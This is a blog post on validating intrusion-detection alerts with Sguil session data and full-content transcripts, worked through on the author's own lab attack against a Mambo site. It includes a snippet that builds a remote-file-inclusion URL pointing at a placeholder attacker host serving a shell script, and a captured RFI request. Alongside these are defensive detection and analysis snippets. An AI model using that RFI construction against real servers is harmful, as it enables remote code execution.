Not only alert data Part III

Posted by ayoi | NSM,work and IT | Wednesday 21 March 2007 3:12 pm

OK, this is the third part of this series. I am supposed to give training on log analysis and on validating events and incidents. I actually planned to publish this post as soon as the second part was finished, but alas I have a few obligations that require my full attention (and I am only halfway through completing my so-called whitepaper).

So far, the main thing I keep ranting/mumbling/complaining about is the lack of the data necessary to validate incidents. While at The Client's site, I realized this “handicap” when The Client asked me about the validity of the incidents or events.

“How do we know whether the attempt is successful or not?”

“What did the attacker actually do?”

“When did the attack start?”

“Why did the hacker attack the subdomain instead of the main domain?”

(OK, this last question is a little bit funny for me to answer; usually I just say, “This one you have to ask the attacker himself. I am no Jedi master who can read his intentions.”)

All of these questions (OK, excluding the last one) can be answered with the assistance of full content, session, and alert data. The validation process becomes more reliable, more trustworthy, and I think less debatable than searching for related alerts based only on the attacker's IP. We may list all the alerts related to the attacker, but can we identify the exact time, or the exact alert, showing that the attacker successfully penetrated the victim? Like I said, validating incidents, events, or alerts based only on the alert information is more of a guessing game.

Now let me show you why having this data is really important.

As I don't have any port mirroring privileges to sniff any other network, I just let my sensor do the attacking.

I have sguil 0.6.1 (server and sensor, including the agents), MySQL 5.0.33, and snort installed on one machine (FreeBSD 6.2-RELEASE). Why FreeBSD? Because of ports. TQ 😀 (I am a lazy brat, OK?)

The targeted system is running FreeBSD 6.1, with MySQL 4.1 and Apache 1.3.37.

So I ran some simulated attacks in my VMware setup using nikto and a remote file inclusion exploit.
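To make the remote file inclusion attempt concrete, here is a minimal sketch of how such an attack URL is put together. The hostnames and file name below are made-up placeholders, not the lab hosts, and this simply builds the string rather than sending it:

```python
from urllib.parse import urlencode

# Hypothetical hosts for illustration only.
target = "http://target.example/mambo/index.php"
evil_script = "http://attacker.example/shell.txt?"

# The attacker points mosConfig_absolute_path at a script he controls,
# so a vulnerable include() fetches and executes the remote PHP code.
attack_url = target + "?" + urlencode({
    "_REQUEST": "",
    "mosConfig_absolute_path": evil_script,
})
```

Feeding a URL shaped like this to the vulnerable script is what produces the payload you will see captured later in this post.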

Here is the list of alerts generated by those activities. (My sguil client runs on Windows XP.)


A little bit of explanation on the interface: ST = Status (where RT = Real Time); CNT = Count; Sensor = sensor name; Alert ID; Date/Time; Src IP = source IP; SPort = source port; Dst IP = destination IP; DPort = destination port; Pr = protocol (where 6 = TCP, 17 = UDP, 1 = ICMP).
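If you ever export alerts from the database and post-process them, the numeric Pr column is easy to translate back to a name. A tiny helper, using the standard IANA protocol numbers mentioned above:

```python
# Map the Pr values Sguil displays back to protocol names.
# 6/17/1 are the standard IANA IP protocol numbers.
IP_PROTOCOLS = {6: "TCP", 17: "UDP", 1: "ICMP"}

def proto_name(pr):
    """Return a readable name for a Pr value, or the raw number as text."""
    return IP_PROTOCOLS.get(pr, str(pr))
```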

On the lower left-hand side there are tabs for IP Resolution (Src and Dst), Sensor Status (Sensor ID, Sensor, Last Alert, Agent, and BY = Barnyard), Snort Statistics (Sensor ID, Sensor, Packet Loss (%), Average Bandwidth (Mb/s), Alerts (per second), Packets (k/sec), and Bytes (/packet)), System Messages, and User Messages.

On the lower right-hand side you can see the packet details, including the payload. You can see the rule details as well.

Now let us concentrate on Alert ID 1.254 = WEB-PHP Remote include path.


It seems that there are 35 remote file inclusion attempts from the attacker to the target. Let us see the correlated events.


Here are the details of the events:


And this is the payload:

GET /mambo/index.php?_REQUEST=&_
mosConfig_absolute_path=http://1 H
TTP/1.1..User-Agent: Mozilla/5.0
(compatible; Konqueror/3.5; Fre
eBSD) KHTML/3.5.5 (like Gecko)..
Accept: text/html, image/jpeg, i
mage/png, text/*, image/*, */*..
Accept-Encoding: x-gzip, x-defla
te, gzip, deflate..Accept-Charse
t: iso-8859-1, utf-8;q=0.5, *;q=
0.5..Accept-Language: en..Host: Keep-

From the payload itself we can identify that the attacker is trying to exploit the MOS bugs and GLOBALS overwrite issues. Again, the basic questions arise here: is the server vulnerable to the attack? Was the attack successful?
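Spotting this pattern in a request line can also be automated. A rough sketch, keyed only on the mosConfig_absolute_path parameter seen in the payload above (real-world checks would cover more parameter names):

```python
import re

# Flag requests where the Mambo config-path parameter points at an
# external URL -- the telltale sign of this remote file inclusion bug.
RFI_RE = re.compile(r"mosConfig_absolute_path=https?://", re.IGNORECASE)

def looks_like_rfi(request_line):
    """Return True if the request line matches the remote-include pattern."""
    return bool(RFI_RE.search(request_line))
```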

That’s the beauty of using sguil: it currently collects session data using SANCP (Security Analyst Network Connection Profiler), full content data, and of course alert data from snort itself. So far I haven’t seen any other application that does the same thing. Maybe in the future we can try to include these data collection mechanisms in our own systems.

For our case, we can just retrieve the communication transcript for the event. Below is the result:


It seems that the attacker is trying to execute cmd.exe over HTTP, but the server gives a 404 response, meaning the attempt was not successful.

But for the mambo inclusion attempt, it seems that the server is vulnerable to the attack: see the 200 response. You can refer here to read about Apache server status codes.

You can see that the attacker is executing the ls command as well.
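This request-vs-response check is exactly the kind of thing you can script once you have transcripts. A toy walker over a simplified transcript (the SRC:/DST: line format here is an assumption, simplified from what Sguil actually prints) that pairs each request with the status code that follows it and keeps only the 200s:

```python
# Pair each request line (SRC) with the status code of the following
# response line (DST) and keep the ones the server answered with 200.
def successful_requests(transcript_lines):
    hits, last_request = [], None
    for line in transcript_lines:
        if line.startswith("SRC: GET"):
            last_request = line
        elif line.startswith("DST: HTTP/") and last_request:
            status = int(line.split()[2])   # "DST: HTTP/1.1 200 OK" -> 200
            if status == 200:
                hits.append((last_request, status))
            last_request = None
    return hits
```

Run over our two attempts, the cmd.exe probe (404) drops out and only the mambo inclusion (200) survives, which matches what we read off the transcript by eye.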


Or you can also use Wireshark to see the content of the communication. Follow the stream, bebeh 😀



You might ask me when I would use the session data. I use it when I try to pick out one particular IP from the others (in this simulation there are only 2 IPs). It is mainly to identify communication that might not have triggered any alert, and to see what other conversations the source/destination IP might have been involved in besides the ones that triggered the alert.
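The kind of query I mean is easy to sketch. The real SANCP table in Sguil's MySQL database has more columns than this; the schema, table contents, and column names below are stand-ins for illustration (using SQLite so the sketch is self-contained):

```python
import sqlite3

# Stand-in for Sguil's SANCP session table; real schema has more columns.
conn = sqlite3.connect(":memory:")
conn.execute("""CREATE TABLE sancp (
    src_ip TEXT, dst_ip TEXT, dst_port INTEGER,
    start_time TEXT, src_bytes INTEGER, dst_bytes INTEGER)""")
conn.executemany("INSERT INTO sancp VALUES (?,?,?,?,?,?)", [
    ("10.0.0.5", "10.0.0.9", 80, "2007-03-21 14:02:11", 612, 5120),
    ("10.0.0.5", "10.0.0.9", 22, "2007-03-21 14:05:40", 180, 240),
    ("10.0.0.7", "10.0.0.9", 80, "2007-03-21 14:06:02", 300, 900),
])

# Every conversation the suspect source IP was involved in,
# whether or not it triggered an alert.
rows = conn.execute(
    "SELECT dst_ip, dst_port, start_time FROM sancp "
    "WHERE src_ip = ? ORDER BY start_time", ("10.0.0.5",)).fetchall()
```

Here the SSH session on port 22 shows up even though no alert fired for it; that is precisely the sort of conversation session data lets you catch.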

I do wish that somebody would be willing to correct me, or to introduce other methods of validating incidents, events, or alerts.








  1. Comment by Hanashi — March 21, 2007 @ 8:16 pm

    Great example! This is exactly how Sguil was designed to be used. Personally, I find myself using transcripts to answer probably 80% or 90% of all my questions when I’m processing alerts, and that saves me tons of time.

    As for the session data, I’ve also had very good results in using it to identify additional events through some basic traffic analysis. With a little SQL-fu, it’s pretty easy to spot scanners, for example. I also correlate session data with PHP injection attack attempts as a rudimentary way to see if any were successful. Datamining the SQL db is a big interest of mine, and most of that hinges on the session data.

  2. Comment by ayoi — March 21, 2007 @ 8:50 pm

    Kewl, hopefully we can share the method as well. Especially on db data mining 😀
